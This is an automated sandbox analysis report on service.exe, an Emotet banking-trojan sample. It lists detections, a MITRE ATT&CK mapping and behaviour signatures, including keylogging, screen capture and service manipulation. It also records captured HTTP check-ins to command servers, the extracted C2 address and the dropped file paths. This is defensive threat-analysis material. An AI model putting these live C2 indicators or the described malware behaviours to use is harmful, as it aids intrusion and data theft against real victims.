Loading ...

Play interactive tourEdit tour

Analysis Report service.exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:206794
Start date:07.02.2020
Start time:16:40:15
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 16m 44s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:service.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Run name:Run as Windows Service
Number of analysed new started processes analysed:14
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.evad.winEXE@16/3@0/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 78.1% (good quality ratio 74.6%)
  • Quality average: 80.6%
  • Quality standard deviation: 28.4%
HCA Information:
  • Successful, ratio: 77%
  • Number of executed functions: 52
  • Number of non-executed functions: 428
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, CompatTelRunner.exe
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Emotet
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Initial sample is implementing a service and should be registered / started as service
Sample is a service DLL but no service has been registered
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Execution through API121Hidden Files and Directories1Valid Accounts1Deobfuscate/Decode Files or Information1Input Capture1System Time Discovery2Remote File Copy2Screen Capture1Data Encrypted11Commonly Used Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
Replication Through Removable MediaCommand-Line Interface2Valid Accounts1Access Token Manipulation1Obfuscated Files or Information2Network SniffingSecurity Software Discovery12Remote ServicesInput Capture1Exfiltration Over Other Network MediumRemote File Copy2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesService Execution13Modify Existing Service12Process Injection11Masquerading12Input CaptureSystem Service Discovery1Windows Remote ManagementClipboard Data1Automated ExfiltrationStandard Cryptographic Protocol22Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskNew Service4New Service4Hidden Files and Directories1Credentials in FilesFile and Directory Discovery2Logon ScriptsInput CaptureData EncryptedStandard Non-Application Layer Protocol2SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessValid Accounts1Account ManipulationSystem Information Discovery36Shared WebrootData StagedScheduled TransferStandard Application Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceAccess Token Manipulation1Brute ForceProcess Discovery2Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskProcess Injection11Two-Factor Authentication InterceptionApplication Window Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: C:\Windows\Temp\setup.exeAvira: detection malicious, Label: TR/AD.Emotet.pabfv
Antivirus detection for sampleShow sources
Source: service.exeAvira: detection malicious, Label: TR/Emotet.rcdix
Found malware configurationShow sources
Source: msradvb.exe.4612.11.memstrMalware Configuration Extractor: Emotet {"C2 list": ["108.6.140.26/HgsN9LrPL"]}
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Windows\Temp\setup.exeVirustotal: Detection: 72%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: service.exeVirustotal: Detection: 64%Perma Link
Machine Learning detection for sampleShow sources
Source: service.exeJoe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0065207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,9_2_0065207B
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0065215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,9_2_0065215A
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00651F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,9_2_00651F75
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00651F56 CryptGetHashParam,9_2_00651F56
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00651F11 CryptExportKey,9_2_00651F11
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00651FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,9_2_00651FFC

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\service.exeCode function: 7_2_0037479C FindFirstFileExA,7_2_0037479C
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00426C63 lstrlenA,FindFirstFileA,FindClose,8_2_00426C63
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0041F3E5 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,8_2_0041F3E5
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00426C63 lstrlenA,FindFirstFileA,FindClose,9_2_00426C63
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0041F3E5 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_0041F3E5
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00426C63 lstrlenA,FindFirstFileA,FindClose,10_2_00426C63
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0041F3E5 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,10_2_0041F3E5
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_00426C63 lstrlenA,FindFirstFileA,FindClose,11_2_00426C63
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_0041F3E5 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_0041F3E5

Networking:

barindex
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: UUNET-MCICommunicationsServicesIncdbaVerizonBusi UUNET-MCICommunicationsServicesIncdbaVerizonBusi
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /09FGR20HEU738LDF007E848F715BVE.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.79.223.161:443Content-Length: 11Cache-Control: no-cacheData Raw: 63 3d 69 6e 73 74 61 6c 6c 65 64 Data Ascii: c=installed
Source: global trafficHTTP traffic detected: POST /HgsN9LrPL HTTP/1.1Referer: http://108.6.140.26/HgsN9LrPLContent-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 108.6.140.26Content-Length: 676Connection: Keep-AliveCache-Control: no-cache
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknownTCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknownTCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknownTCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknownTCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknownTCP traffic detected without corresponding DNS query: 108.6.140.26
Source: unknownTCP traffic detected without corresponding DNS query: 108.6.140.26
Source: unknownTCP traffic detected without corresponding DNS query: 108.6.140.26
Source: unknownTCP traffic detected without corresponding DNS query: 108.6.140.26
Source: unknownTCP traffic detected without corresponding DNS query: 108.6.140.26
Source: unknownTCP traffic detected without corresponding DNS query: 108.6.140.26
Source: unknownTCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknownTCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknownTCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknownTCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknownTCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknownTCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknownTCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknownTCP traffic detected without corresponding DNS query: 108.6.140.26
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /09FGR20HEU738LDF007E848F715BVE.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.79.223.161:443Content-Length: 11Cache-Control: no-cacheData Raw: 63 3d 69 6e 73 74 61 6c 6c 65 64 Data Ascii: c=installed
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 07 Feb 2020 15:41:34 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Urls found in memory or binary dataShow sources
Source: msradvb.exe, 0000000B.00000002.5987599317.0000000000199000.00000004.00000001.sdmpString found in binary or memory: http://108.6.140.26/HgsN9LrPL
Source: service.exeString found in binary or memory: http://www.PowerProgrammer.co.uk(
Source: msradvb.exe, service.exeString found in binary or memory: http://www.Powerprogrammer.co.uk
Source: service.exeString found in binary or memory: http://www.Powerprogrammer.co.ukOnTopbad
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboardShow sources
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0040307D EndDialog,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetWindowPlacement,GetDlgItemInt,GetDlgItemInt,GetDlgItemInt,GetWindowPlacement,SetWindowPlacement,GetWindowPlacement,GetDesktopWindow,GetWindowPlacement,SetWindowPlacement,SetDlgItemInt,SetDlgItemInt,GetDlgItemInt,GetDlgItemInt,GetWindowPlacement,SetWindowPlacement,IsDlgButtonChecked,IsDlgButtonChecked,SetWindowPos,IsDlgButtonChecked,ShowWindow,Beep,Beep,GetDC,CreateCompatibleDC,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,DeleteDC,ReleaseDC,Beep,ShowWindow,ShellExecuteA,CheckDlgButton,CheckDlgButton,CheckDlgButton,SetWindowPos,GetWindowPlacement,8_2_0040307D
Contains functionality to record screenshotsShow sources
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0040307D EndDialog,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetWindowPlacement,GetDlgItemInt,GetDlgItemInt,GetDlgItemInt,GetWindowPlacement,SetWindowPlacement,GetWindowPlacement,GetDesktopWindow,GetWindowPlacement,SetWindowPlacement,SetDlgItemInt,SetDlgItemInt,GetDlgItemInt,GetDlgItemInt,GetWindowPlacement,SetWindowPlacement,IsDlgButtonChecked,IsDlgButtonChecked,SetWindowPos,IsDlgButtonChecked,ShowWindow,Beep,Beep,GetDC,CreateCompatibleDC,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,DeleteDC,ReleaseDC,Beep,ShowWindow,ShellExecuteA,CheckDlgButton,CheckDlgButton,CheckDlgButton,SetWindowPos,GetWindowPlacement,8_2_0040307D
Potential key logger detected (key state polling based)Show sources
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0042E273 GetKeyState,GetKeyState,GetKeyState,8_2_0042E273
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00424642 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,8_2_00424642
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0040A722 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,8_2_0040A722
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00431187 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,8_2_00431187
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0042F5B7 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,8_2_0042F5B7
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004118CE GetKeyState,GetKeyState,GetKeyState,GetKeyState,8_2_004118CE
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0042E273 GetKeyState,GetKeyState,GetKeyState,9_2_0042E273
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00424642 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,9_2_00424642
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0040A722 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,9_2_0040A722
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00431187 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,9_2_00431187
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0042F5B7 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,9_2_0042F5B7
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004118CE GetKeyState,GetKeyState,GetKeyState,GetKeyState,9_2_004118CE
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0042E273 GetKeyState,GetKeyState,GetKeyState,10_2_0042E273
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00424642 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,10_2_00424642
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0040A722 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,10_2_0040A722
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00431187 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,10_2_00431187
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0042F5B7 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,10_2_0042F5B7
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_004118CE GetKeyState,GetKeyState,GetKeyState,GetKeyState,10_2_004118CE
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_0042E273 GetKeyState,GetKeyState,GetKeyState,11_2_0042E273
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_00424642 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,11_2_00424642
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_0040A722 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,11_2_0040A722
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_00431187 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,11_2_00431187
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_0042F5B7 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,11_2_0042F5B7
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_004118CE GetKeyState,GetKeyState,GetKeyState,GetKeyState,11_2_004118CE

E-Banking Fraud:

barindex
Detected Emotet e-Banking trojanShow sources
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0065CCBC9_2_0065CCBC
Yara detected EmotetShow sources
Source: Yara matchFile source: 00000009.00000002.4301641382.0000000000651000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.4300993909.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000A.00000002.4298966674.0000000000651000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000008.00000002.4276006913.0000000000E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000B.00000002.5988263486.00000000005E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000B.00000002.5987644935.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000008.00000002.4276050052.0000000000E21000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000A.00000002.4298327167.00000000001F0000.00000040.00000001.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00651F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,9_2_00651F75

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000009.00000002.4301641382.0000000000651000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000009.00000002.4300993909.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 0000000A.00000002.4298966674.0000000000651000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000008.00000002.4276006913.0000000000E10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 0000000B.00000002.5988263486.00000000005E1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 0000000B.00000002.5987644935.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000008.00000002.4276050052.0000000000E21000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 0000000A.00000002.4298327167.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Contains functionality to delete servicesShow sources
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0065CE88 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle,9_2_0065CE88
Contains functionality to launch a process as a different userShow sources
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00651D2B CreateProcessAsUserW,CreateProcessW,9_2_00651D2B
Creates files inside the system directoryShow sources
Source: C:\Users\user\Desktop\service.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\service.exeCode function: 7_2_0037ACC57_2_0037ACC5
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004560218_2_00456021
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004361AF8_2_004361AF
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0044033D8_2_0044033D
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004324308_2_00432430
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004565638_2_00456563
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004365CF8_2_004365CF
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0040C62E8_2_0040C62E
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0044C6B18_2_0044C6B1
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00456BC28_2_00456BC2
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00456E368_2_00456E36
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00450E918_2_00450E91
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00440EAF8_2_00440EAF
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00446EA98_2_00446EA9
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00446FBF8_2_00446FBF
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004571408_2_00457140
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004393B68_2_004393B6
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004354FC8_2_004354FC
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0044D6DD8_2_0044D6DD
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0044D8CA8_2_0044D8CA
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004578CA8_2_004578CA
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004499CC8_2_004499CC
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004359CF8_2_004359CF
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00459A218_2_00459A21
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00455AF88_2_00455AF8
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00435DA38_2_00435DA3
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00443FC38_2_00443FC3
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00E128C18_2_00E128C1
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00E130E48_2_00E130E4
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00E130E88_2_00E130E8
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00E1F1ED8_2_00E1F1ED
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00E237A58_2_00E237A5
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00E237A98_2_00E237A9
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00E22F828_2_00E22F82
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004560219_2_00456021
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004361AF9_2_004361AF
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0044033D9_2_0044033D
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004324309_2_00432430
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004565639_2_00456563
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004365CF9_2_004365CF
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0040C62E9_2_0040C62E
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0044C6B19_2_0044C6B1
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00456BC29_2_00456BC2
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00456E369_2_00456E36
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00450E919_2_00450E91
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00440EAF9_2_00440EAF
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00446EA99_2_00446EA9
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00446FBF9_2_00446FBF
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004571409_2_00457140
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004393B69_2_004393B6
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004354FC9_2_004354FC
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0044D6DD9_2_0044D6DD
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0044D8CA9_2_0044D8CA
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004578CA9_2_004578CA
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004499CC9_2_004499CC
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004359CF9_2_004359CF
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00459A219_2_00459A21
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00455AF89_2_00455AF8
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00435DA39_2_00435DA3
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00443FC39_2_00443FC3
Source: C:\Windows\Temp\setup.exeCode function: 9_2_001F28C19_2_001F28C1
Source: C:\Windows\Temp\setup.exeCode function: 9_2_001F30E89_2_001F30E8
Source: C:\Windows\Temp\setup.exeCode function: 9_2_001F30E49_2_001F30E4
Source: C:\Windows\Temp\setup.exeCode function: 9_2_006537A59_2_006537A5
Source: C:\Windows\Temp\setup.exeCode function: 9_2_006537A99_2_006537A9
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00652F829_2_00652F82
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0045602110_2_00456021
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_004361AF10_2_004361AF
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0044033D10_2_0044033D
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0043243010_2_00432430
